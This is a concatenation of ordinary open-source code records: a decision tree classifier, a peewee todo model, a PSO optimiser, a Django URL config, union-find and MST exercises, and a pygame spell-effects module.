True\n else:\n return False\n \n def build_children(self, method, threshold):\n '''\n 检测退出条件\n '''\n if(self._build_exit()):\n return \n '''\n 构建子节点\n '''\n if(method == 'information gain'):\n x_index, x_val = self._get_x_and_xval(entropy_condition, threshold)\n else:\n #method == 'information gain ratio'\n x_index, x_val = self._get_x_and_xval(entropy_condition_ratio, threshold)\n '''\n 无需分割\n label置为当前最多的label值\n ?\n '''\n if(x_index == None):\n #self.label = self.default_label\n return\n self.next_split_index = x_index\n for val in x_val:\n splited_xy = self.xy[self.xy[:, x_index] == val]\n splited_xy = np.delete(splited_xy, [x_index], axis = 1)\n self.children.append(DTNode(splited_xy[:, :-1], splited_xy[:, -1].reshape(-1, 1), self.default_label, val))\n \n def cart_build_children(self, method, threshold):\n '''\n 检测退出条件\n '''\n if(self._cart_build_exit()):\n return \n '''\n 构建子节点\n '''\n if(method == 'gini'):\n x_index, x_val = self._cart_get_x_and_feature(gini_condition, threshold, self.cart_cols)\n if(x_index == None):\n return\n self.next_split_index = x_index\n splited_left_xy = self.xy[self.xy[:, x_index] == x_val]\n splited_right_xy = self.xy[self.xy[:, x_index] != x_val]\n next_cart_cols = self.cart_cols.copy()\n next_cart_cols.remove(x_index)\n self.children.append(DTNode(splited_left_xy[:, :-1], splited_left_xy[:, -1].reshape(-1, 1), \n self.default_label, x_val, cart_cols = next_cart_cols))\n self.children.append(DTNode(splited_right_xy[:, :-1], splited_right_xy[:, -1].reshape(-1, 1), \n self.default_label, x_val, cart_cols = next_cart_cols))\n\n\n# In[128]:\n\n\nfrom collections import Counter\nclass DecisionTree:\n '''\n 决策树\n '''\n def __init__(self, method, threshold):\n self.x = None\n self.y = None\n self.root = None\n self.threshold = threshold\n self.default_label = None\n self.method = method\n if(method == 'ID3'):\n self.feature_selection_method = \"information gain\"\n elif(method == 'cart clf'):\n self.feature_selection_method = \"gini\"\n else:\n #method == 'C4.5'\n self.feature_selection_method = \"information gain ratio\"\n def fit(self, x, y):\n self.x = x\n self.y = y\n '''\n 筛选默认label,即训练集中频率最高的label\n '''\n self.default_label = Counter(self.y.reshape(1, -1).tolist()[0]).most_common(1)[0][0]\n '''\n 宽度遍历建立决策树\n '''\n self.root = DTNode(x, y, self.default_label, cart_cols = list(range(self.x.shape[1])))\n queue = [self.root]\n while(len(queue) > 0):\n node = queue.pop(0)\n if('information' in self.feature_selection_method):\n node.build_children(self.feature_selection_method, self.threshold)\n else:\n node.cart_build_children(self.feature_selection_method, self.threshold)\n queue += node.get_children()\n def show(self):\n '''\n 展示各个节点的信息\n '''\n queue = [self.root]\n while(len(queue) > 0):\n node = queue.pop(0)\n print('==============')\n print('node label:', node.get_label())\n print('node split_val', node.get_split_val())\n print('node next_split_index:', node.get_next_split_index())\n print('xy:')\n print(node.get_xy())\n queue += node.get_children()\n \n\n\n# In[129]:\n\n\nxy = np.array([[0,0,0,0,0,1,1,1,1,1,2,2,2,2,2], [0,0,1,1,0,0,0,1,0,0,0,0,1,1,0], [0,0,0,1,0,0,0,1,1,1,1,1,0,0,0], \n [0,1,1,0,0,0,1,1,2,2,2,1,1,2,0], [0,0,1,1,0,0,0,1,1,1,1,1,1,1,0]]).T\ndt = DecisionTree(method = 'cart clf', threshold = 0.01)\ndt.fit(xy[:, :-1], xy[:, -1].reshape(-1, 1))\ndt.show()\n\n\n# In[130]:\n\n\nxy = np.array([[0,0,0,0,0,1,1,1,1,1,2,2,2,2,2], [0,0,1,1,0,0,0,1,0,0,0,0,1,1,0], [0,0,0,1,0,0,0,1,1,1,1,1,0,0,0], \n [0,1,1,0,0,0,1,1,2,2,2,1,1,2,0], [0,0,1,1,0,0,0,1,1,1,1,1,1,1,0]]).T\ndt = DecisionTree(method = 'ID3', threshold = 0.1)\ndt.fit(xy[:, :-1], xy[:, -1].reshape(-1, 1))\ndt.show()\n\n","repo_name":"Wchenguang/gglearn","sub_path":"DecisionTree/DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"24279709478","text":"import datetime\nimport json\n\nfrom itsdangerous import (TimedJSONWebSignatureSerializer as Serializer,\n BadSignature, SignatureExpired)\nfrom peewee import *\n\nimport config\nimport mock\n\nDATABASE = SqliteDatabase('todo.sqlite')\n\nclass Todo(Model):\n name = CharField()\n completed = BooleanField()\n edited = BooleanField()\n\n class Meta:\n database = DATABASE\n\n @classmethod\n def write_new_todo(cls, name, completed=False, edited=False):\n try:\n with DATABASE.transaction():\n return cls.create(name=name,\n completed=completed,\n edited=edited)\n except IntegrityError:\n raise ValueError(\"Entry already exists\")\n\n @classmethod\n def update_todo(cls, todo_id, name, completed, edited, **kwargs):\n if kwargs:\n try:\n todo_id = kwargs.pop('todo_id', None)\n exe = Todo.update(**kwargs).where((Todo.id==todo_id)).execute()\n return exe\n except (DataError, Exception) as e:\n print(e)\n else:\n try:\n todo = cls.get_specific_todo(todo_id)\n todo.name = name\n todo.completed = completed\n todo.edited = edited\n todo.save()\n return todo\n except (DataError, Exception) as e:\n print(e)\n\n @classmethod\n def get_all_todos(cls):\n return cls.select()\n\n @classmethod\n def get_specific_todo(cls, todo_id):\n return cls.select().where(Todo.id == todo_id).get()\n\n\ndef initialize():\n DATABASE.connect(reuse_if_open=True)\n DATABASE.create_tables([Todo], safe=True)\n with DATABASE.atomic():\n with open('mock/todos.json', 'r') as initial_data:\n for data_dict in json.loads(initial_data.read()):\n if not Todo.select().where(Todo.name==data_dict['name']):\n data_dict['completed'] = False\n data_dict['edited'] = False\n Todo.create(**data_dict)\n DATABASE.close()\n","repo_name":"fkirwin/todoapi","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71048553068","text":"# Paisaje usando fractales\r\n# Alumno: Oaxaca Pérez David Arturo\r\n# Materia: Evolutionary Computing\r\n# Profesor: Dr. Jorge Luis Rosas Trigueros\r\n# Lab Session 06: Particle Swarm Optmization\r\n# Basado en el codigo del Dr. Jorge Luis Rosas Trigueros visto en clase\r\n# Grupo: 3CV11\r\n# Fecha de realización: 15/10/2021\r\n\r\n#Original File: pso_wikipedia.ipynb\r\n#Example of PSO based on the wikipedia entry\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\nlower_limit=-5\r\nupper_limit=5\r\n\r\nn_particles=10\r\nn_dimensions=2\r\n\r\n# Función a evaluar con el algoritmo\r\ndef ackley_function(x, y):\r\n return -20.0 * np.exp(-0.2 * np.sqrt(0.5 * (x**2 + y**2))) - \\\r\n np.exp(0.5 * (np.cos(2 * np.pi * x)+np.cos(2 * np.pi * y))) + np.e + 20 \r\n\r\n\r\n# Initialize the particle positions and their velocities\r\n#Bias the initial population\r\nX = lower_limit + 0.25*(upper_limit - lower_limit) * np.random.rand(n_particles, n_dimensions) \r\nassert X.shape == (n_particles, n_dimensions)\r\n# V = np.zeros(X.shape)\r\nV = -(upper_limit - lower_limit) + 2*(upper_limit - lower_limit)*np.random.rand(n_particles, n_dimensions)\r\n \r\n# Initialize the global and local fitness to the worst possible\r\nfitness_gbest = np.inf\r\nfitness_lbest = fitness_gbest * np.ones(n_particles)\r\n\r\nX_lbest = 1*X\r\nX_gbest = 1*X_lbest[0]\r\n\r\nfitness_X = np.zeros(X.shape)\r\n\r\nfor i in range(0, n_particles):\r\n if ackley_function(X_lbest[i][0], X_lbest[i][1]) < ackley_function(X_gbest[0], X_gbest[1]):\r\n X_gbest = 1*X_lbest[i]\r\n\r\n\r\ncount=0\r\n\r\ndef iteration():\r\n global count\r\n global X,X_lbest,X_gbest,V\r\n\r\n # Loop until convergence, in this example a finite number of iterations chosen\r\n weight=0.7 # Inercia\r\n C1=0.2 # Historia personal\r\n\r\n C2=0.1 # Seguir la tendencia que va marcando el lider\r\n\r\n count+=1\r\n\r\n if count%100 == 0:\r\n print (f\"Generation {count}: Best particle in: {X_gbest} \\ngbest: {ackley_function(X_gbest[0], X_gbest[1])}\\n\")\r\n\r\n # Update the particle velocity and position\r\n for I in range(0, n_particles):\r\n for J in range(0, n_dimensions):\r\n R1 = np.random.rand()#uniform_random_number()\r\n R2 = np.random.rand()#uniform_random_number()\r\n V[I][J] = (weight*V[I][J]\r\n + C1*R1*(X_lbest[I][J] - X[I][J]) \r\n + C2*R2*(X_gbest[J] - X[I][J]))\r\n X[I][J] = X[I][J] + V[I][J]\r\n if ackley_function(X[I][0], X[I][1]) < ackley_function(X_lbest[I][0], X_lbest[I][1]):\r\n X_lbest[I]=1*X[I]\r\n if ackley_function(X_lbest[I][0], X_lbest[I][1]) < ackley_function(X_gbest[0], X_gbest[1]):\r\n X_gbest=1*X_lbest[I]\r\n \r\n\r\n\r\nfor i in range(2500):\r\n iteration()\r\n","repo_name":"david-oaxaca/Evolutionary-Computing","sub_path":"Lab Session 06 - Particle Swarm Optimization/Code/Ackley_PSO_Lab_Session06.py","file_name":"Ackley_PSO_Lab_Session06.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38393251845","text":"\"\"\"silumz URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url\nfrom django.contrib import admin\nfrom images import views\n\nurlpatterns = [\n url(r'^$', views.index),\n url(r'^article/(?P\\d+)/$', views.page, name='article'),\n url(r'^tag/(?P\\d+)/$', views.tag, name='tag'),\n url(r'^type/(?P\\d+)/$', views.type, name='type'),\n url(r'^search/', views.search),\n url(r'^get_video/', views.getVideo),\n url(r'^video/', views.pVideo),\n url(r'^mvideo/', views.mVideo),\n url(r'^tag/', views.HotTag),\n url(r'^sort/(?P\\w+)/$', views.SortBy, name='sort'),\n]\n","repo_name":"hijkpw/94imm","sub_path":"silumz/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":88,"dataset":"github-code","pt":"37"} +{"seq_id":"5963319315","text":"__author__ = 'dong.qu'\n\n\nclass UF():\n \"\"\"\n quick union\n \"\"\"\n def __init__(self, N):\n self.N = N\n self.parent_val = list(range(N))\n\n def find_root(self, p_idx):\n while p_idx != self.parent_val[p_idx]:\n p_idx = self.parent_val[p_idx]\n return p_idx\n\n def union(self, p, q):\n p_rt = self.find_root(p)\n q_rt = self.find_root(q)\n if p_rt == q_rt:\n pass\n else:\n self.parent_val[q] = p_rt\n self.N -= 1\n\n def connected(self, p, q):\n return self.find_root(p) == self.find_root(q)\n\n def count(self):\n return self.N\n\nuf = UF(6)\nuf.union(3,4)\nprint(uf.parent_val)\nuf.union(4,5)\nuf.union(1,3)\nuf.union(1,4)\nprint(uf.parent_val)\nprint(uf.connected(1,5))\n","repo_name":"qd452/Algorithm4","sub_path":"PyAlgo4/src/uf_review.py","file_name":"uf_review.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"24814368563","text":"def solution(n, costs):\n ans = 0\n costs.sort(key=lambda x:x[2])\n data = set([costs[0][0]])\n \n while len(data)!=n:\n for cost in costs:\n if cost[0] in data and cost[1] in data:\n continue\n if cost[0] in data or cost[1] in data:\n data.update([cost[0],cost[1]])\n ans+=cost[2]\n break\n\n return ans\n","repo_name":"JiIJu/algorithm_algorithm","sub_path":"학사 지이주/2023/3월/0322/섬 연결하기.py","file_name":"섬 연결하기.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71875484907","text":"import pygame, math, random\nfrom pygame.locals import *\n\ndef ground_at(LEVEL, x, f=False):\n \"\"\"Finds the y co-ordinate of the ground at position x.\"\"\"\n ysense = 479\n sensing = True\n while sensing:\n sensetile = LEVEL.map[x//40][ysense//40]\n if not sensetile or \"NONE\" in sensetile.collidetype: break\n if sensetile.collidetype == \"RIGHT_INCLINATION\":\n if x%40 < 40-(ysense%40):\n break\n elif sensetile.collidetype == \"RIGHT_HINCLINATION1\":\n if x%40 < 2*(40-(ysense%40)):\n break\n elif sensetile.collidetype == \"RIGHT_HINCLINATION2\":\n if (x%40)+40 < 2*(40-(ysense%40)):\n break\n elif sensetile.collidetype == \"LEFT_INCLINATION\":\n if x%40 > ysense%40:\n break\n elif sensetile.collidetype == \"LEFT_HINCLINATION1\":\n if x%40 + 40 > 2*(ysense%40):\n break\n elif sensetile.collidetype == \"LEFT_HINCLINATION2\":\n if (x%40) > 2*(ysense%40):\n break\n ysense -= [1,10][f]\n if ysense <= 0: return 479\n return ysense\n\ndef m_init_data(data):\n global DATA\n DATA = data\n\nclass Spell: # Spell is a class that (basically) all spells are based on\n def __init__(self, caster, x, y):\n self.cost = 0\n self.x = x\n self.y = y\n self.caster = caster\n self.a_step = 0\n self.ticker = 0\n self.LEVELSTATE = None\n self.MONSTERSTATE = None\n self.RAIN_H = False\n self.finished = False\n\n self.SOUND = \"\"\n self.fvm = None # Faceview monster\n self.fvd = 0 # faceview damage\n\n self.s_init()\n\n def s_init(self):\n pass\n\n def blit(self, surf, ALT_X = 0, ALT_Y = 0):\n if not self.finished: self.s_blit(surf, ALT_X, ALT_Y)\n\n def tick(self, LEVEL, MONSTERS, CASTER, RAIN = False):\n if self.finished: return\n self.RAIN_H = RAIN\n self.LEVELSTATE = LEVEL\n self.MONSTERSTATE = MONSTERS\n self.ticker += 1\n self.caster = CASTER\n self.stick()\n\nclass Fire_1(Spell):\n def s_init(self):\n self.cost = 4\n if self.caster.mp[0] < self.cost: self.finished = True; return\n self.frames = [\"m_fire1_\" + str(x) + \".png\" for x in range(1,6)]\n self.flame_entities = []\n self.caster.mbreaktime = 16\n self.caster.mp[0] -= self.cost\n self.mydir = self.caster.direction * 2 - 1\n self.unchdir = self.caster.direction\n self.x += self.mydir * 10\n self.rise = 0\n\n def s_blit(self, surf, ALT_X, ALT_Y):\n c = 0\n for flame in self.flame_entities:\n if flame == -40: continue\n gimg, grect = DATA.mag_images[\"m_fire1_glow.png\"]\n img, rect = DATA.mag_images[self.frames[flame%5]]\n rect.midbottom = (self.x + flame*8, self.y-math.sin(flame/2.0)*5.0+c*self.rise+((c+0.001)**(abs(self.rise)+1))*[1,-1][self.rise<0])\n rect.move_ip(ALT_X, ALT_Y)\n grect.midbottom = (self.x + flame*8, self.y-math.sin(flame/2.0)*5.0+c*self.rise+((c+0.001)**(abs(self.rise)+1))*[1,-1][self.rise<0])\n grect.move_ip(ALT_X, ALT_Y+3)\n surf.blit(img, rect)\n surf.blit(gimg, grect)\n c += 1\n\n def stick(self):\n\n self.y = self.caster.y - 25\n self.x = self.caster.x\n self.caster.jumping = False\n if len(self.flame_entities) < 8:\n self.caster.direction = self.unchdir\n\n if not self.ticker % 2:\n if len(self.flame_entities) < 8:\n self.flame_entities = [0] + self.flame_entities\n\n self.flame_entities = [[x + self.mydir,-40][[x<-35 or x>0,x>35 or x<0][self.unchdir]] for x in self.flame_entities]\n\n\n if self.caster.up_held: self.rise -= 0.05\n if self.caster.down_held: self.rise += 0.05\n\n # Collision detections\n\n c = 0\n for flame in self.flame_entities:\n\n if flame == -40: continue\n img, rect = DATA.mag_images[self.frames[flame%5]]\n rect.midbottom = (self.x + flame*8, self.y-math.sin(flame/2.0)*5.0+c*self.rise+((c+0.001)**(abs(self.rise)+1))*[1,-1][self.rise<0])\n\n if self.check_collide(rect):\n self.flame_entities[c] = -40\n\n c += 1\n\n if sum(self.flame_entities) == 8 * -40:\n self.finished = True\n\n def check_collide(self, crect):\n for monster in self.MONSTERSTATE:\n monsterrect = pygame.rect.Rect((0,0,monster.collision_dist*2,monster.collision_hdist*2))\n monsterrect.center = monster.x, monster.y\n if crect.colliderect(monsterrect):\n damage = (self.caster.magic[0] * 3)/15.0\n self.caster.combodamage += min(damage, monster.hp)\n monster.react_to_magic(damage)\n self.fvm = monster\n self.fvd = damage\n self.caster.combo += 1\n return True\n return False\n\nclass Summon(Spell):\n def s_init(self):\n self.caster.mbreaktime = 20\n self.rays = []\n self.alphamod = 0.0\n def s_blit(self, surf, ALT_X, ALT_Y):\n global DATA\n alphamult = self.alphamod / 100.0\n if alphamult > 0:\n for width, phase, magnitude in self.rays:\n rayrect = Rect(0, 0, width, 480)\n variance = math.sin(phase) * magnitude\n rayrect.midbottom = self.caster.x + variance, self.caster.y\n raysurf = pygame.Surface(rayrect.size)\n colour = (int(20 + magnitude * 2.5), 50 + width * 3, int(220 - phase * 10))\n raysurf.fill(colour)\n relalpha = max(0, min(255, 255 - (abs(variance)) * (255/100.0))) * 0.3\n raysurf.set_alpha(alphamult * relalpha)\n surf.blit(raysurf, rayrect.move(ALT_X, ALT_Y))\n\n def stick(self):\n ri = random.randint\n if self.alphamod and self.caster.mbreaktime:\n self.caster.animation = \"Stopped\"\n self.caster.torso_animation = \"Cast\"\n\n\n if self.ticker < 25:\n # Creation of rays phase\n if not self.ticker % 3:\n self.rays.append([ri(5,35), ri(-30,30)/10.0, ri(5, 30)]) # Width, phase, magntd\n\n self.alphamod = min(self.alphamod + 7.5, 100)\n\n if self.ticker > 25:\n self.alphamod -= 10\n if self.alphamod < 0: self.alphamod = 0; self.finished = True\n\n for r in range(len(self.rays)):\n ray = self.rays[r]\n self.rays[r][1] += ray[2]/300.0\n\nclass Burst(Spell):\n def s_init(self):\n global DATA\n self.caster.mbreaktime = 30\n def s_blit(self, surf, ALT_X, ALT_Y):\n global DATA\n self.mticker = -abs(self.ticker-15)+15\n pic = DATA.mag_images[\"Burst.png\"][0]\n msurf = pygame.transform.scale(pic, (max(5, min(185, self.mticker**3))+15, max(5, min(185, self.mticker**3))+15))\n msurf = pygame.transform.rotate(msurf, self.ticker**1.8)\n rect = msurf.get_rect()\n rect.center = (self.x + ALT_X, self.y + ALT_Y)\n surf.blit(msurf, rect)\n if self.ticker >= 30:\n self.finished = True\n def stick(self):\n self.x, self.y = self.caster.x, self.caster.y - 40\n if self.ticker%3: return\n for monster in self.MONSTERSTATE:\n dist = abs(monster.x - self.x) + abs(monster.y - self.y)\n if dist > 110:\n continue\n monster.react_to_magic(0)\n\nclass Ice_1(Spell):\n def s_init(self):\n global DATA\n self.affected = []\n self.cant = self.caster.mp[0] < 4\n def s_blit(self, surf, ALT_X, ALT_Y):\n global DATA\n if not self.affected:\n if self.ticker >= 0: self.finished = True\n return\n self.mticker = -abs(self.ticker-15)+15\n msurf = pygame.transform.scale(DATA.mag_images[\"ice.png\"][0], (max(5, min(125, self.mticker**2))+15, max(5, min(125, self.mticker**2))+15))\n msurf = pygame.transform.rotate(msurf, self.ticker**1.7)\n rect = msurf.get_rect()\n for mon in self.affected:\n rect.center = (mon.x + ALT_X, mon.y-40 + ALT_Y)\n surf.blit(msurf, rect)\n if self.ticker == 10:\n dmg = int(random.randint(80,120)/100.0 * self.caster.magic[0] * 0.6)\n self.caster.combodamage += min(dmg, mon.hp)\n mon.react_to_magic(dmg)\n self.fvm = mon\n self.fvd = dmg\n self.caster.combo += 1\n\n if self.ticker >= 30:\n self.finished = True\n\n def stick(self):\n if self.affected == []:\n for monster in self.MONSTERSTATE:\n xdist = abs(monster.x-self.caster.x)\n if xdist < 300 and not monster.isdead:\n if self.caster.mp[0] >= 4:\n self.affected.append(monster)\n self.caster.mp[0] -= 4\n if len(self.affected):\n self.SOUND = \"Ice.ogg\"\n self.caster.animation = \"Stopped\"\n self.caster.torso_animation = \"Cast\"\n self.caster.frame = 0\n self.caster.tframe = 0\n self.caster.casting = True\n self.caster.mbreaktime = 30\n\nclass Ice_2(Ice_1):\n def s_init(self):\n global DATA\n self.affected = []\n self.cant = self.caster.mp[0] < 8\n def s_blit(self, surf, ALT_X, ALT_Y):\n global DATA\n if not self.affected:\n if self.ticker >= 0: self.finished = True\n return\n self.mticker = -abs(self.ticker-15)+15\n msurf = pygame.transform.scale(DATA.mag_images[\"ice2.png\"][0], (max(5, min(125, self.mticker**2))+15, max(5, min(125, self.mticker**2))+15))\n msurf = pygame.transform.rotate(msurf, self.ticker**1.7)\n rect = msurf.get_rect()\n for mon in self.affected:\n rect.center = (mon.x + ALT_X, mon.y-40 + ALT_Y)\n surf.blit(msurf, rect)\n if self.ticker == 10:\n dmg = int(random.randint(80,120)/100.0 * self.caster.magic[0] * 1.1)\n self.caster.combodamage += min(dmg, mon.hp)\n mon.react_to_magic(dmg)\n self.fvm = mon\n self.fvd = dmg\n self.caster.combo += 1\n\n\n if self.ticker >= 30:\n self.finished = True\n\n def stick(self):\n if self.affected == []:\n for monster in self.MONSTERSTATE:\n xdist = abs(monster.x-self.caster.x)\n if xdist < 300 and not monster.isdead:\n if self.caster.mp[0] >= 8:\n self.affected.append(monster)\n self.caster.mp[0] -= 8\n if len(self.affected):\n self.SOUND = \"Ice.ogg\"\n self.caster.animation = \"Stopped\"\n self.caster.torso_animation = \"Cast\"\n self.caster.frame = 0\n self.caster.tframe = 0\n self.caster.casting = True\n self.caster.mbreaktime = 45\n\nclass Fire_2(Spell):\n def s_init(self):\n self.cost = 12\n if self.caster.mp[0] < self.cost: self.finished = True; return\n self.frames = [\"m_fire1_\" + str(x) + \".png\" for x in range(1,6)]\n self.flame_entities = []\n self.caster.mbreaktime = 40\n self.caster.mp[0] -= self.cost\n self.mydir = self.caster.direction * 2 - 1\n self.unchdir = self.caster.direction\n self.x += self.mydir * 10\n self.rise = 0\n\n def s_blit(self, surf, ALT_X, ALT_Y):\n c = 0\n for flame in self.flame_entities:\n if flame == -666: continue\n gimg, grect = DATA.mag_images[\"m_fire1_glow.png\"]\n img, rect = DATA.mag_images[self.frames[flame%5]]\n rect.midbottom = (self.x + flame*4, self.y-math.sin(flame/2.0)*5.0+c*self.rise+((c+0.001)**(abs(self.rise)+1))*[1,-1][self.rise<0])\n rect.move_ip(ALT_X, ALT_Y)\n grect.midbottom = (self.x + flame*4, self.y-math.sin(flame/2.0)*5.0+c*self.rise+((c+0.001)**(abs(self.rise)+1))*[1,-1][self.rise<0])\n grect.move_ip(ALT_X, ALT_Y+3)\n for y in range(-1,2):\n surf.blit(img, rect.move(0,y*flame))\n surf.blit(gimg, grect.move(0, y*flame))\n c += 1\n\n def stick(self):\n\n self.y = self.caster.y - 25\n self.x = self.caster.x\n self.caster.jumping = False\n if len(self.flame_entities) < 8:\n self.caster.direction = self.unchdir\n\n if not self.ticker % 2:\n if len(self.flame_entities) < 8:\n self.flame_entities = [0] + self.flame_entities\n\n self.flame_entities = [[x + self.mydir,-666][[x<-65 or x>0,x>65 or x<0][self.unchdir]] for x in self.flame_entities]\n\n\n if self.caster.up_held: self.rise -= 0.05\n if self.caster.down_held: self.rise += 0.05\n\n # Collision detections\n\n c = 0\n for flame in self.flame_entities:\n\n if flame == -666: continue\n img, rect = DATA.mag_images[self.frames[flame%5]]\n rect.midbottom = (self.x + flame*4, self.y-math.sin(flame/2.0)*5.0+c*self.rise+((c+0.001)**(abs(self.rise)+1))*[1,-1][self.rise<0])\n\n for y in range(-1,2):\n if self.check_collide(rect.move(0, y*flame)):\n self.flame_entities[c] = -666\n\n c += 1\n\n if sum(self.flame_entities) == 8 * -666:\n self.finished = True\n\n def check_collide(self, crect):\n for monster in self.MONSTERSTATE:\n monsterrect = pygame.rect.Rect((0,0,monster.collision_dist*2,monster.collision_hdist*2))\n monsterrect.center = monster.x, monster.y\n if crect.colliderect(monsterrect):\n damage = (self.caster.magic[0] * 8)/60.0\n self.caster.combodamage += min(monster.hp, damage)\n monster.react_to_magic(damage)\n self.fvm = monster\n self.fvd = damage\n self.caster.combo += 1\n return True\n return False\n\nclass Quake(Spell):\n def s_init(self):\n self.cost = 15\n if self.caster.mp[0] < self.cost: self.finished = True; return\n self.caster.mbreaktime = 26\n self.caster.mp[0] -= self.cost\n self.ticker = 0\n self.px = 0\n self.py = 0\n\n def s_blit(self, surf, ALT_X, ALT_Y):\n self.caster.quaking = True\n\n def stick(self):\n self.ticker += 1\n hitlist = []\n if not self.ticker%20:\n for mon in self.MONSTERSTATE:\n if mon.x > self.caster.x - 350 and mon.x < self.caster.x + 350:\n if mon.affected[\"quake\"]:\n hitlist.append(mon)\n for monster in hitlist:\n damage = self.caster.magic[0] * 0.8\n damage *= random.randint(75, 125)/100.0\n self.caster.combodamage += min(damage, monster.hp)\n monster.react_to_damage(int(damage))\n self.caster.combo += 1\n\n\n if self.ticker == 100:\n self.finished = True\n self.caster.quaking = False\n\n\nclass Implosion_1(Spell):\n def s_init(self):\n global DATA\n self.affected = []\n self.cant = self.caster.mp[0] < 15\n def s_blit(self, surf, ALT_X, ALT_Y):\n global DATA\n pic = DATA.mag_images[\"bubble.png\"][0]\n if not self.affected:\n if self.ticker >= 0: self.finished = True\n return\n\n for mon in self.affected:\n moncentre = (mon.x + ALT_X, mon.y-40 + ALT_Y)\n eachang = (math.pi/4)\n r = max(0, 300 - self.ticker*15)\n turn = self.ticker / 5.0\n sp = max(4, 20-self.ticker/2)\n for x in range(8):\n for c in range(10):\n xp = math.cos(x * eachang + turn + (c * 0.15)*(-1**c)) * (r + c * sp)\n yp = math.sin(x * eachang + turn + (c * 0.15)*(-1**c)) * (r + c * sp)\n rect = pic.get_rect()\n rect.center = moncentre\n rect.move_ip(xp, yp)\n surf.blit(pic, rect)\n\n def stick(self):\n if self.affected == []:\n for monster in self.MONSTERSTATE:\n xdist = abs(monster.x-self.caster.x)\n if xdist < 400 and not monster.isdead:\n if self.caster.mp[0] >= 15:\n self.affected.append(monster)\n\n self.affected.sort(key=lambda x: x.maxhp)\n\n if len(self.affected):\n self.affected = self.affected[:1]\n self.caster.mp[0] -= 15\n self.SOUND = \"Implosion.ogg\"\n self.caster.animation = \"Stopped\"\n self.caster.torso_animation = \"Cast\"\n self.caster.frame = 0\n self.caster.tframe = 0\n self.caster.casting = True\n self.caster.mbreaktime = 25\n\n for mon in self.affected:\n if self.ticker >= 20 and not self.ticker%5:\n dmg = int(random.randint(90,155)/100.0 * self.caster.magic[0] * 0.8)\n self.caster.combodamage += min(dmg, mon.hp)\n mon.react_to_magic(dmg)\n self.fvm = mon\n self.fvd = dmg\n self.caster.combo += 1\n\n if self.ticker >= 31:\n self.finished = True\n\n\nclass Summon_Maea(Spell):\n def s_init(self):\n global DATA\n self.cost = 80\n if self.caster.mp[0] < self.cost: self.finished = True; return\n self.caster.mbreaktime = 50\n self.caster.mp[0] -= self.cost\n self.dir = self.caster.direction\n self.x = [640, -262][self.dir]\n self.inertia = [-10, 10][self.dir]\n self.bubbles = []\n self.bombs = []\n self.y = 50\n self.inertia2 = 0\n\n self.mouthpos = (130, 50)\n\n def s_blit(self, surf, ALT_X, ALT_Y):\n global DATA\n\n darkness = pygame.Surface((640, 480))\n if self.ticker < 120:\n darkness.set_alpha(7 * min(30, self.ticker))\n else:\n darkness.set_alpha(max(0, 1050 - self.ticker*7))\n\n surf.blit(darkness, (0,0))\n\n if self.dir:\n surf.blit(DATA.images[\"Summon1.png\"][0], (self.x, self.y))\n else:\n surf.blit(pygame.transform.flip(DATA.images[\"Summon1.png\"][0], True, False), (self.x, self.y))\n\n for x, y, p in self.bombs:\n bfs, bfr = DATA.images[\"bluefire.png\"]\n nbfs = pygame.transform.scale(bfs, (int(math.cos(-p/2) * 240), int(math.sin(p) * 250)))\n nbfr = nbfs.get_rect()\n nbfr.midbottom = (x, y + 5)\n nbfr.move_ip(ALT_X, ALT_Y)\n surf.blit(nbfs, nbfr)\n\n for x, y, a in self.bubbles:\n bs, br = DATA.mag_images[\"bubble.png\"]\n surf.blit(bs, br.move(self.mouthpos).move(x,y))\n\n def stick(self):\n self.x += self.inertia\n if self.dir:\n self.inertia -= 0.1\n else:\n self.inertia += 0.1\n\n self.inertia2 += 0.01\n self.y += self.inertia2\n\n if self.x < -280 or self.x > 658: self.finished = True\n\n if self.ticker <= 100 and not self.ticker%9:\n if self.dir:\n sp = int(self.caster.x - 300)\n else:\n sp = int(self.caster.x + 300)\n\n cx = [sp - self.ticker * 8, sp + self.ticker * 8][self.dir]\n self.bombs.append([cx, ground_at(self.LEVELSTATE, cx, True), 0])\n\n # We want angle to swing like a pendulum between 45 and 135 degrees\n degree_variance = math.sin(self.ticker/6.0) * 80\n bdv = -degree_variance\n degree = degree_variance + 90\n angle = math.radians(degree)\n self.bubbles.append([self.x, self.y, angle])\n degree = bdv + 90\n angle = math.radians(degree)\n self.bubbles.append([self.x, self.y, angle])\n\n for b in range(len(self.bubbles)):\n self.bubbles[b][0] += math.cos(self.bubbles[b][2]) * 10\n self.bubbles[b][1] += math.sin(self.bubbles[b][2]) * 10\n\n for z in range(len(self.bombs)):\n self.bombs[z][2] += 0.1\n if self.bombs[z][2] > 3:\n self.bombs[z] = None\n continue\n\n hitlist = []\n if abs(self.bombs[z][2] - 1.1) < 0.0000001:\n for monster in self.MONSTERSTATE:\n if abs(monster.x - self.bombs[z][0]) < 100:\n if monster.y > self.bombs[z][1] - 220:\n hitlist.append(monster)\n\n for monster in hitlist:\n damage = self.caster.magic[0] * random.randint(8, 12) / 20.0\n monster.react_to_damage(int(damage))\n self.fvm = monster\n self.fvd = damage\n\n 